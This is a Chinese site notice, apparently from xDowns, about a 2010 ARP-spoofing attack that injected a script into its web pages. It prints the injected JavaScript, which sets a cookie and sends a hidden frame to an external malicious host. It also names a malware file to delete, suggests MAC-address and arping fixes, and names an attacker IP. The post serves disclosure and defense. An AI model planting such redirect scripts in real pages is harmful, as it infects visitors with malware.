文章正文

已经找到源，解决了，这种攻击防火墙是不报攻击的 ，类似UpdatedPage=随机数字的症状。目前无解决方案。机房要杜绝这样的败类服务器，发现直接封机器算了，居心不良
网页被修改如下
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://u****.33#22.org:6677/9/index.html";}
}
</script>



</frameset>
</html>
感谢iqshw.com 亮亮的提醒 其实我们发现了，只是一直查不到是arp攻击
另外，绿盟服务器是不可能会给黑的，最多就是通过arp攻击整个机房网段来进行arp欺骗。
      幸好3322.org这个是个人电脑架设的网站，这个arp的人估计不会得逞，因为这样的流量会把他的电脑的网站搞挂了。
这类arp欺骗是最新的欺骗方式，目前没有比较好的解决方法，当同一个网段一个服务器给黑了，就会对整个网段的服务器造成威胁，同样原理，可以对163进行“挂马”，真是防不胜防。只能发现攻击源就关闭服务器了

是否中毒？补救:

如果您的电脑有以下文件请删除之，（如果没以下情况，就说明没事）

C:\Program Files\Common Files\MsCom\Automaticd.exe

建议用unlocker http://www.xdowns.com/soft/softdown.asp?softid=60808 删除  或者用360或者金山卫士就可以删除

被ARP攻击的网站的临时解决方案：更换mac地址，然后用arping命令对网关广播最新的地址，就可以了。

攻击者资料：125.91.10.187  汕头adsl用户，2010年6月1日13:29:05 已经记录在案，已向汕头网监报警。

文章来自绿盟(xDowns.com)转载请注明来路。

上一篇文章：腾讯微博1.1.0 For iPhone []

相关文章

相关软件